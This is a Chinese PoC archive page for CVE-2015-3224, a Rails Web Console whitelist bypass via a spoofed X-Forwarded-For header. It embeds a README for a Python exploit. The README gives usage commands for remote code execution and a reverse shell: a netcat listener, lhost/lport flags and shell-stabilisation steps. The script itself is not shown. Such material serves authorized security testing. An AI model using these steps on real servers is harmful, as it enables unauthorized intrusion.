关联漏洞
标题:
Ruby on Rails Web Console 代码注入漏洞
(CVE-2015-3224)
描述:Ruby on Rails(Rails)是Rails核心团队开发维护的一套基于Ruby语言的开源Web应用框架,它是由大卫-海纳梅尔-韩森从美国37signals公司的项目管理工具Basecamp里分离出来的。Web Console是一套基于Web的用于在服务器上执行shell命令的应用程序。 Ruby on Rails中使用的Web Console中的request.rb文件存在安全漏洞,该漏洞源于程序确定客户端IP地址时没有限制使用X-Forwarded-For头。远程攻击者可通过发送特制的请求利用该
描述
Ruby on Rails Web Console Exploit (CVE-2015-3224)
介绍
# Ruby on Rails Web Console Exploit (CVE-2015-3224)
This repository contains a **Python script** to exploit an **IP whitelist bypass vulnerability** in the developer web console of **Ruby on Rails 4.0.x and 4.1.x**. The script allows for **remote code execution** on vulnerable servers.
> ⚠️ **Disclaimer**
> This script is intended for educational purposes and authorized security testing only.
> **Do not** use it on any system without explicit permission.
> The authors are **not responsible** for any misuse or damage caused by this script.
---
## 📌 Description of the Vulnerability
The web console in vulnerable versions of Ruby on Rails is intended for development purposes and should only be accessible from trusted IP addresses. However, due to improper handling of the `X-Forwarded-For` HTTP header, an attacker can **spoof their IP address** to appear as a trusted local user (e.g., `127.0.0.1` or `::1`). This bypasses the IP whitelist and **grants unauthorized access** to the web console, leading to **remote code execution**.
---
## 🚀 Features
- **Easy to Use**: Simple command-line interface.
- **Dynamic Path Discovery**: Automatically probes the target to find the dynamic console session path.
- **Two Shell Modes**:
- **Simple Shell**: A basic, non-interactive shell for quick commands.
- **Reverse TTY Shell**: A one-line command to get a fully interactive PTY reverse shell.
- **Enhanced Readability**: Color-coded output for status messages, successes, and errors.
- **Robust**: Includes error handling for network issues and failed commands.
---
## ✅ Requirements
- Python 3
- `requests` library
Install `requests`:
```bash
pip install requests
```
---
## ⚙️ Usage
1. **Clone the repository:**
```bash
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <repo-directory>
```
2. **Make the script executable:**
```bash
chmod +x exploit.py
```
### Option 1: Simple Interactive Shell
This mode is useful for running quick, simple commands.
```bash
./exploit.py -t http://<TARGET_IP>:<PORT>
```
### Option 2: Full Interactive TTY (Reverse Shell)
This is the recommended mode for a stable, fully interactive shell.
#### Step 1: Start a Listener
On your local machine, open a new terminal and start a `netcat` listener.
```bash
nc -lvnp 9001
```
#### Step 2: Run the Exploit
In another terminal, run the script with the `--rev-shell` flag, providing your local IP (`lhost`) and port (`lport`).
```bash
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
```
#### Step 3: Stabilize the Shell
A connection will arrive at your `netcat` listener. To upgrade it to a fully interactive TTY, follow these steps *in the netcat window*:
1. **Background the shell** by pressing `Ctrl+Z`.
2. **Set your local terminal to raw mode** and bring the shell to the foreground.
```bash
stty raw -echo; fg
```
Press `Enter` if the prompt doesn't reappear.
3. **Set the terminal properties** on the remote shell.
```bash
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
```
You now have a fully functional and stable shell!
---
## 👥 Credits
- **Original Exploit**: Eval (@0xEval)
- **The Readme.md file**: GPT
文件快照
[4.0K] /data/pocs/7f38343f7d3d910c6e18a503265e253a048536d4
├── [6.5K] exploit.py
└── [3.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。